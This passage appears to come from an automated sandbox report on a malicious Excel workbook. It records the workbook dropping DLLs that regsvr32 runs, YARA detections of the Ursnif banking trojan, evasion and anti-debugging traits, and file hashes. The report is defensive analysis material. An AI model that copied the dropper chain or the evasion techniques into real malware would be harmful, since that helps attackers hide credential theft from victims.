Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0446A push esi; ret	4_2_67B0446B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0633B push edx; retf	4_2_67B06345
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B05B7B push eax; ret	4_2_67B05B7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3D33E push dword ptr [ecx+4BFFD4DAh]; retf	4_2_67B3D348
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3E175 push ds; iretd	4_2_67B3E179

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\block.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\Public\block.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\Public\block.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll

Jump to dropped file

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_00BB4E9C

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_67AF1F31 LoadLibraryA,GetProcAddress,

4_2_67AF1F31

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3BFB5 mov eax, dword ptr fs:[00000030h]	4_2_67B3BFB5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3BAF2 push dword ptr fs:[00000030h]	4_2_67B3BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3BEEB mov eax, dword ptr fs:[00000030h]	4_2_67B3BEEB

Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB3946 cpuid

4_2_00BB3946

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	4_2_67AF1566
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_67B2F574
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_67B35C41
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	4_2_67B2FBE2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	4_2_67B2D27D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,	4_2_67B30133

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_67AF17A7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB3946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

4_2_00BB3946

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_67AF146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

4_2_67AF146C

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

ID:	402998
Product:	CloudBasic
Start time:	17:10:38
Start date:	03.05.2021
Sample:	4Y2I7k0.xlsb
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	6798cc178ee3d27d23bdfb81c44f404f
SHA1:	d52cf93a65288e388782e3dcf982a765998e89f7
SHA256:	92728e6532d7288ef1223a443bd6ad01faf0815258d1d1d513d4bf9111fcc306
Filetype:	Excel Microsoft Office Binary workbook document (47504/1) 49.74%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\block.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	5A7C87DAB250CEE78CE63AC34117012B	554C4CCF2341182768D475087D8A8BCFAA525A12	8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{61E1F67A-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	5A01E87E43F8CE82CFEC152EBD4D3CFA	C83985F9AC40326C4EC42B88DDF0F9C1FCBAE180	01E3BF241AABA5B25582C37FBC72D14D811F587071B86E856235D2A8975C5FF4
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7CFE4BA0-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	514EA53AFF62FF9A286360B74ED8E296	AB40130F9AE11241EB0EC59F6E2D2411A5B82912	DB93485F6E859DE1A4BB16EEF60FDE703A1E4AAC313E50AB47D33C9D0EE3D58E
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8D1871FB-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	FAB0510AE2BA4293527C5AC518D56E71	170DCA2A20D5FC0FA83C9E84AE6F6E434D1F4725	8EE0EBAE2F9A967830C737E1A30ADFBCC425373CC238A6D970FE6CC86B57203B
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9B5A9DD8-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	1E0F188165FB522340CC406FEDA5607B	EBD5B4978B1809D4D6A1A06AF6A2FA568B46A5FA	404D579D1782C68E6D64A5328DDDE19D3F4B14A92F6CE393ED4F0B47E7FF447E
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{61E1F67C-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	B34170960A0E5833607A09E392AE7ABC	04D393697831413F74BBAA828ACD7FA995BBB8EF	10C917BC0CB6985D887ABA21ABB0A0DAF30B059F0AED1D679B3D54796B5DDB73
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7CFE4BA2-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	4E0D4FB8D782A953D1D556317F1FB9EE	BF47E7223DDA4E65C9AA408D61D218000687E764	5D8DA3EB3AC44C8BD12E114D7D73869A261A2F650CE0CE00C082188F64E0F904
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8D1871FD-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	2146F9A83338F447C224725024D5D8C7	F3E1A85C827CD2E928AE6C6336C86CF2306594C6	A847019BBB9F787F347244F13B4CAD1F0C2BE00B8C990FC4C9E52A0548664828
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9B5A9DDA-AC6D-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	45798E423F1CB028CCAFC71CDF4AFA95	93B32407923F850BA4ABE4B5A2F4EF5C08E37169	F266F055FBCD83E07B7E6F2B6FFC7B220448DE3831B1687477926B3593531EBD
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	525E2C7CD480719F20BECD31E12C29B6	8FE20DC4ED2EFF7F9072859EB15671D63180C435	D53CED428083C55F053BCC661F70822C977174754F36A2758076FFC465DCD261
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	D93DC1FF60C3C7438655B9659391C2F7	9B3F11693B51653C6449CC49443D01B527409A97	BF023E13CA5713860B99044A78AB437FEEBF98A389BC713B63F4B119D5E0BC10
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	7615654478DCF13C14C901EE89B553DB	65BA93457412021789B4F336A48EB31B6709ADB3	AF04C9C59D6EC87DF0F9B1E541491DB9A8D0B01F760B0F2E6EE68393508FC6B8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	4200C41EF466C5BD2D700D07274ACD7B	D538317B4CB0CC6E675BEAA2A55C2E865145153F	58F70F89DD0CE38A0ADEEFC5B6FA7DE66CE1AC2F80B8E9569FBFCD14C44C9C8B
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	1716BC0D6338E0ADEF97542ED304B699	7F09624DAD6D988EA77892E05B3CC41FEDC35E70	9BBE8018C6321C739334335D91711B135C8437AD948CBD4FB934612A166C0701
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	2E64FBC54CD66AEEC678B9F496198F96	E8F956BE097CE5820BDA7D2DC4589672D2A213AC	B8CFDAA46D3D11F5C6AEA153C526784B7B421E58E17CFF2DA54EAF6069502D8B
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	461BBE89FF5D77EE5D25793561DC29A6	7C9750556A932892F9751E1F873EFB193B0D8415	76D59D417EA03872A12F284108CC4B8FBF418969B6D568080B0BA5CEFCE408B8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	F63F3DE83930F05D946F456ACC31D735	8750F872BF71602C3C22E108653B969F30092A9D	1C246E3B66DBD9D17B37FB20E10239FA032C058259A992F569D7C87A8C0BCB5E
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	CE674D7DC2317AA22E374A3EDC413BE0	18A2BA157DCB82719755492D71453DE5C29B6030	08F7FC5698ED09A6361C85A63055FDFDC87B24D7881458497E3B76448BF63BE9
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DFB7A469-C2BA-4377-83DE-2A2821BDEB41	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	324614919B56EB3A25A167739C0F8BD3	ED8135CC600310419734ACAC7A38BC367ED4DE8E	DDA75322C2497F5E733E7325F4C7FF836D4775A9DF54B3B89F05C5B23B744996
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7EEC5F21.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	A516B6CB784827C6BDE58BC9D341C1BD	9D602E7248E06FF639E6437A0A16EA7A4F9E6C73	EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\828C0ED7.png	PNG image data, 240 x 52, 8-bit/color RGBA, non-interlaced	D4E702617A12082888A2FD8BB0A2A8AC	7F3A85C42B1B6814E3F32AD579BE8DF4CFF825B3	94102F2D952184B98AF8F0459D6B98AE55CD9D1F445F0EA15A4163A6ED3E3579
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E2056AEC.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 169x94, frames 3	D07199047FEA546752A9193766EC22C8	B7AF4CBD8D8ABD6EBB51F5A2E6F2F42B49802FDF	F9372424D6940099390601A593A2E623AD8F04D575D298686A9D92B53B1C3A98
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E89833A0.png	PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced	D8574C9CC4123EF67C8B600850BE52EE	5547AC473B3523BA2410E04B75E37B1944EE0CCC	ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EA20FAAE.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	02DB1068B56D3FD907241C2F3240F849	58EC338C879DDBDF02265CBEFA9A2FB08C569D20	D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\ErrorPageTemplate[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	F4FE1CB77E758E1BA56B8A8EC20417C5	F4EDA06901EDB98633A686B11D02F4925F827BF0	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\background_gradient[1]	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3	20F0110ED5E4E0D5384A496E4880139B	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\bullet[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	26F971D87CA00E23BD2D064524AEF838	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\errorPageStrings[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D65EC06F21C379C87040B83CC1ABAC6B	208D0A0BB775661758394BE7E4AFB18357E46C8B	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\info_48[1]	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced	5565250FCC163AA3A79F0B746416CE69	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\ErrorPageTemplate[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	F4FE1CB77E758E1BA56B8A8EC20417C5	F4EDA06901EDB98633A686B11D02F4925F827BF0	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\ErrorPageTemplate[2]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	F4FE1CB77E758E1BA56B8A8EC20417C5	F4EDA06901EDB98633A686B11D02F4925F827BF0	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\background_gradient[1]	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3	20F0110ED5E4E0D5384A496E4880139B	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\bullet[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	26F971D87CA00E23BD2D064524AEF838	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
